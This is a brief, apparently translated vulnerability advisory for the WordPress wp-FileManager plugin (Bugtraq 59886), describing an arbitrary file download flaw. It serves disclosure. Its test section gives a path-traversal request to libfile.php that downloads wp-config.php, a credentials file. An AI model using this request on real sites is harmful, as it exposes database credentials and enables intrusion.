Release date:
Updated on: 2013-05-17
Affected Systems:
WordPress wp-FileManager
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59886
The FileManager for WordPress plugin can be used to modify, delete, organize, and upload files.
WordPress wp-FileManager plugin has a security vulnerability that allows attackers to download arbitrary files from the website.
<* Source: ByEge
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php? & Amp; path = ../& amp; filename = wp-config.php & amp; action = download
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://wordpress.org/extend/plugins/wp-filemanager/